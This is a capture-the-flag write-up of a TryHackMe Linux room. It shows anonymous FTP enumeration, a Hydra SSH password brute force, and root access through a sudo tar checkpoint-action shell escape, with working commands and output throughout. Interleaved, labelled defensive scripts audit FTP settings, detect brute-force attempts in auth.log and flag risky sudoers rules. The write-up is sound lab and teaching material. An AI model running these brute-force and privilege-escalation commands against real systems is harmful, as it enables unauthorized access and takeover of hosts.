Tryhackme Bounty Hunter


1. Introduction

Welcome back guys, today we will take on a new room from TryHackMe called Bounty-Hunter. This is a beginner-friendly Linux machine. The room contains only 1 task with 7 questions.

Our objective is to find the user's password and capture all the flags on the machine.

2. Enumeration

As always, enumeration is our main key, so let's scan the machine with Nmap.

sudo nmap -sC -sV -T4 10.10.205.103


 ─[zen-prime@zerr0-satellite]─[~/htb/bountyhunter]
 └╼ [★]$ sudo nmap -sC -sV -T4 -oA initial.nmap 10.10.205.103
 Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 23:27 IST
 Nmap scan report for 10.10.205.103
 Host is up (0.35s latency).
 Not shown: 967 filtered ports, 30 closed ports
 PORT   STATE SERVICE VERSION
 21 /tcp open  ftp     vsftpd 3.0.3
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 | -rw-rw-r--    1 ftp      ftp           418 Jun 07 21:41 locks.txt
 |_-rw-rw-r--    1 ftp      ftp            68 Jun 07 21:47 task.txt
 | ftp-syst: 
 |   STAT: 
 | FTP server status:
 |      Connected to ::ffff:10.9.70.156
 |      Logged in as ftp
 |      TYPE: ASCII
 |      No session bandwidth limit
 |      Session timeout in seconds is 300
 |      Control connection is plain text
 |      Data connections will be plain text
 |      At session startup, client count was 4
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 22 /tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
 |   256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
 |_  256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
 80 /tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
 |_http-server-header: Apache/2.4.18 (Ubuntu)
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel


Three ports are open:

21 : FTP

22 : SSH

80 : HTTP

From the Nmap result we can identify that this server allows anonymous FTP login, so let's check the FTP server of this machine.

ftp 10.10.205.103

 ─[zen-prime@zerr0-satellite]─[~/htb/bountyhunter]
 └──╼ [★]$ ftp 10.10.205.103
 Connected to 10.10.205.103.
 220 (vsFTPd 3.0.3)
 Name (10.10.205.103:zen-prime): anonymous
 230 Login successful.
 Remote system type is UNIX.
 Using binary mode to transfer files.
 ftp> dir
 200 PORT command successful. Consider using PASV.
 150 Here comes the directory listing.
 -rw-rw-r--    1 ftp      ftp           418 Jun 07 21:41 locks.txt
 -rw-rw-r--    1 ftp      ftp            68 Jun 07 21:47 task.txt
 226 Directory send OK.
 ftp>

Yeah! We logged in to the FTP server successfully. On the FTP server we can see that two files are present: task.txt and locks.txt.

The first one, task.txt, gives us the answer to question #3 of our task, and it's a username on that machine.

Lin

The second one, locks.txt, is a password list which will help us brute-force the login.
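From the defender's side, the ftp-anon finding above comes down to a single vsftpd.conf key. The following shell script is an added example (not part of this write-up or the room): it reads a vsftpd configuration file and reports whether anonymous logins are enabled, then checks a permissive sample next to a hardened one. Both sample configurations are constructed for the example and written to temporary files; treating a missing anonymous_enable key as YES follows the default documented in vsftpd.conf(5).

```shell
#!/bin/sh
# Added example (not from the room): audit a vsftpd.conf for the
# anonymous-login setting that Nmap's ftp-anon script flagged.

# Print the effective anonymous_enable value from the file given as $1.
# vsftpd.conf(5) documents the default as YES, so a missing key is
# reported as YES. Lines starting with '#' are comments; when the key
# appears more than once, the last occurrence wins.
anon_ftp_setting() {
    awk -F= '
        /^[ \t]*#/ { next }                       # skip comment lines
        $1 == "anonymous_enable" { v = toupper($2) }
        END { print (v == "" ? "YES" : v) }
    ' "$1"
}

# Return 0 if anonymous FTP is disabled, 1 if it is enabled.
audit_vsftpd_conf() {
    setting=$(anon_ftp_setting "$1")
    if [ "$setting" = "YES" ]; then
        echo "WEAK: $1 allows anonymous FTP (anonymous_enable=$setting)"
        return 1
    fi
    echo "OK:   $1 has anonymous_enable=$setting"
    return 0
}

# Constructed sample configs: the permissive one mirrors what the scan
# observed (anonymous login allowed); the hardened one disables
# anonymous access and only lets local accounts log in, read-only.
weak_conf=$(mktemp)
cat > "$weak_conf" <<'EOF'
listen=YES
anonymous_enable=YES
anon_upload_enable=NO
EOF

hardened_conf=$(mktemp)
cat > "$hardened_conf" <<'EOF'
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=NO
EOF

audit_vsftpd_conf "$weak_conf" || true
audit_vsftpd_conf "$hardened_conf"
rm -f "$weak_conf" "$hardened_conf"
```

Run it as a plain `sh` script; point `audit_vsftpd_conf` at `/etc/vsftpd.conf` on a host you administer to get the same WEAK/OK verdict the scan above would produce from the outside.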

3. Bruteforce

From Nmap we saw another service running on port 22 of this machine, which is SSH, so let's brute-force this service with our password list locks.txt for the username lin using hydra.

hydra -l lin -P locks.txt -t 15 ssh://10.10.205.103

 ─[zen-prime@zerr0-satellite]─[~/htb/bountyhunter]
 └──╼ [★]$ hydra -l lin -P locks.txt -t 15 ssh://10.10.205.103
 Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

 Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-14 00:18:59
 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
 [DATA] max 15 tasks per 1 server, overall 15 tasks, 26 login tries (l:1/p:26), ~2 tries per task
 [DATA] attacking ssh://10.10.205.103:22/
 [22][ssh] host: 10.10.205.103   login: lin   password: R******3
 1 of 1 target successfully completed, 1 valid password found
 [WARNING] Writing restore file because 1 final worker threads did not complete until end.
 [ERROR] 1 target did not resolve or could not be connected
 [ERROR] 0 targets did not complete
 Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-14 00:19:08

Hydra did its work perfectly: it gives us the SSH password for this machine, so we have the answer to question #5 of the task.

So let's connect to this machine over SSH.
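Every one of Hydra's login tries leaves a line from sshd in /var/log/auth.log on the target, so this stage is easy to spot from the other side. The script below is an added example, not from the write-up or the room: it counts failed password attempts per source IP and separately flags a source that logs in successfully after failing, which is what a guessed password looks like in the log. The auth.log lines are constructed for the example (the 10.9.70.156 and 192.168.0.14 addresses are borrowed from the scan and login banner shown elsewhere in this write-up), and the threshold of 5 failures is an arbitrary choice.

```shell
#!/bin/sh
# Added example (not from the room): detect SSH password guessing from
# the standard sshd lines in auth.log.

# Print "<ip> <failures>" for every source with at least $2 failed
# password attempts in log file $1 (threshold defaults to 5).
brute_force_sources() {
    threshold=${2:-5}
    awk -v thr="$threshold" '
        /sshd\[[0-9]+\]: Failed password for/ {
            # the source address is the word after "from"
            for (i = 1; i <= NF; i++) if ($i == "from") ip = $(i + 1)
            fails[ip]++
        }
        END {
            for (ip in fails) if (fails[ip] >= thr) print ip, fails[ip]
        }
    ' "$1" | sort
}

# Print "<ip> <user>" when a source that had already failed at least
# once then logs in successfully: the signature of a guessed password.
successful_after_failures() {
    awk '
        /sshd\[[0-9]+\]: Failed password for/ {
            for (i = 1; i <= NF; i++) if ($i == "from") ip = $(i + 1)
            fails[ip]++
        }
        /sshd\[[0-9]+\]: Accepted password for/ {
            for (i = 1; i <= NF; i++) {
                if ($i == "for")  user = $(i + 1)
                if ($i == "from") ip = $(i + 1)
            }
            if (fails[ip] > 0) print ip, user
        }
    ' "$1"
}

# Constructed auth.log excerpt: six failures and then a success from
# one address, and a clean login from another address for contrast.
SAMPLE_LOG=$(mktemp)
cat > "$SAMPLE_LOG" <<'EOF'
Sep 14 00:18:59 bountyhacker sshd[1201]: Failed password for lin from 10.9.70.156 port 51002 ssh2
Sep 14 00:18:59 bountyhacker sshd[1203]: Failed password for lin from 10.9.70.156 port 51004 ssh2
Sep 14 00:19:00 bountyhacker sshd[1205]: Failed password for lin from 10.9.70.156 port 51006 ssh2
Sep 14 00:19:01 bountyhacker sshd[1207]: Failed password for invalid user admin from 10.9.70.156 port 51008 ssh2
Sep 14 00:19:02 bountyhacker sshd[1209]: Failed password for lin from 10.9.70.156 port 51010 ssh2
Sep 14 00:19:03 bountyhacker sshd[1211]: Failed password for lin from 10.9.70.156 port 51012 ssh2
Sep 14 00:19:08 bountyhacker sshd[1240]: Accepted password for lin from 10.9.70.156 port 51040 ssh2
Sep 14 00:20:30 bountyhacker sshd[1260]: Accepted password for lin from 192.168.0.14 port 40230 ssh2
EOF

echo "== sources over threshold =="
brute_force_sources "$SAMPLE_LOG"
echo "== success after failures =="
successful_after_failures "$SAMPLE_LOG"
```

On a real host, run the two functions against /var/log/auth.log (or the journal exported with `journalctl -u ssh`); the second report is the one worth paging on, since a burst of failures alone may only be noise, but a success that follows it means the guess worked.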

4. SSH Connection

So we have the username and password; now let's log in.

ssh lin@10.10.205.103

 ─[zen-prime@zerr0-satellite]─[~/htb/bountyhunter]
 └──╼ [★]$ ssh lin@10.10.205.103
 The authenticity of host '10.10.205.103 (10.10.205.103)' can't be established.
 ECDSA key fingerprint is SHA256:fzjl1gnXyEZI9px29GF/tJr+u8o9i88XXfjggSbAgbE.
 Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
 Warning: Permanently added '10.10.205.103' (ECDSA) to the list of known hosts.
 lin@10.10.205.103's password:
 Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-101-generic x86_64)

  • Documentation: https://help.ubuntu.com
  • Management: https://landscape.canonical.com
  • Support: https://ubuntu.com/advantage

 83 packages can be updated.
 0 updates are security updates.

 Last login: Sun Jun 7 22:23:41 2020 from 192.168.0.14
 lin@bountyhacker:~/Desktop$ whoami
 lin

So we have access to the machine. Now let's check for our flags; first we will look for the user flag.

ls -l

 lin@bountyhacker:~/Desktop$ ls -l
 total 4
 -rw-rw-r-- 1 lin lin 21 Jun  7 17:06 user.txt
 lin@bountyhacker:~/Desktop$ cat user.txt
 THM{C**_***}

USER FLAG

THM{C_***}

Now question #6 is completed.

5. Privilege Escalation

So we have the user flag of this machine. Now let's see how to get the root flag.

First, let's check which commands our user lin can run with sudo on this machine.

It can be checked with the command

sudo -l

 lin@bountyhacker:~/Desktop$ sudo -l
 [sudo] password for lin:
 Matching Defaults entries for lin on bountyhacker:
     env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

 User lin may run the following commands on bountyhacker:
     (root) /bin/tar

Our user lin can run tar with root permissions. Without wasting time, let's jump to GTFOBins, which lists binaries that can be used for escalation.

Let's search for tar.

From GTFOBins we learn that tar can also be used for escalation.

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

 lin@bountyhacker:~/Desktop$ whoami
 lin
 lin@bountyhacker:~/Desktop$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
 tar: Removing leading / from member names

whoami

root

id

uid=0(root) gid=0(root) groups=0(root) #
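The root cause here is the sudoers rule, not tar itself: once sudo grants a binary that can spawn other programs (which is what GTFOBins catalogues), the rule is effectively a root shell. The script below is an added example, not from the write-up or the room: it scans a sudoers file for rules that grant such a binary, or ALL, to a non-root user, and then checks a hardened alternative in which lin may only run a root-owned wrapper that calls tar with fixed arguments, so no user-supplied option reaches tar. Both sudoers files, the /usr/local/sbin/backup-desktop wrapper path and the short list of flagged binaries are constructed for the example; the parser handles only the plain `user host=(runas) [NOPASSWD:] cmd, cmd` form, not aliases or include directives.

```shell
#!/bin/sh
# Added example (not from the room): audit sudoers rules for binaries
# that give a shell once run as root.

# Binaries known to offer a shell escape under sudo (a constructed
# subset of the GTFOBins "sudo" entries; tar is the one on this box).
RISKY_BINS="tar vim find less"

# Print "<user> <command> <reason>" for every rule in sudoers file $1
# that grants a risky binary, or ALL, to someone other than root.
sudo_shell_escapes() {
    awk -v list="$RISKY_BINS" '
        BEGIN { n = split(list, a, " "); for (i = 1; i <= n; i++) risky[a[i]] = 1 }
        /^[ \t]*(#|Defaults)/ { next }            # comments and Defaults lines
        NF == 0 { next }
        {
            user = $1
            rhs = $0
            sub(/^[^=]*=/, "", rhs)                  # drop "user host="
            sub(/^[ \t]*\([^)]*\)[ \t]*/, "", rhs)   # drop "(runas)"
            m = split(rhs, cmds, ",")
            for (j = 1; j <= m; j++) {
                cmd = cmds[j]
                gsub(/^[ \t]+|[ \t]+$/, "", cmd)
                sub(/^[A-Z]+:[ \t]*/, "", cmd)       # drop tags such as NOPASSWD:
                split(cmd, parts, " ")
                path = parts[1]
                base = path
                sub(/.*\//, "", base)
                if (path == "ALL" && user != "root")
                    print user, path, "unrestricted"
                else if (base in risky)
                    print user, path, "shell-escape-capable"
            }
        }
    ' "$1"
}

# Constructed sudoers matching what "sudo -l" showed on bountyhacker.
weak_sudoers=$(mktemp)
cat > "$weak_sudoers" <<'EOF'
Defaults env_reset
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
lin ALL=(root) /bin/tar
EOF

# Hardened alternative: lin may only run a root-owned, non-writable
# wrapper (hypothetical path) that invokes tar with fixed arguments,
# so options like --checkpoint-action can never be supplied by lin.
hardened_sudoers=$(mktemp)
cat > "$hardened_sudoers" <<'EOF'
Defaults env_reset
root ALL=(ALL:ALL) ALL
lin ALL=(root) /usr/local/sbin/backup-desktop
EOF

echo "== weak =="
sudo_shell_escapes "$weak_sudoers"
echo "== hardened =="
sudo_shell_escapes "$hardened_sudoers"
```

The weak file yields two findings (the group rule and lin's tar rule); the hardened file yields none. The wrapper approach only helps if the script itself is root-owned, not writable by lin, and does not pass any of its own arguments through to tar.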

Now we have root access. Let's check what is inside the root flag.

cat /root/root.txt
# cat /root/root.txt  
THM{8*****_******}

Root Flag

THM{8_***}

Our last question, #7, of this task is now completed.

6. Conclusion

Yeah, the machine was really cool and helpful for learning.

Thanks.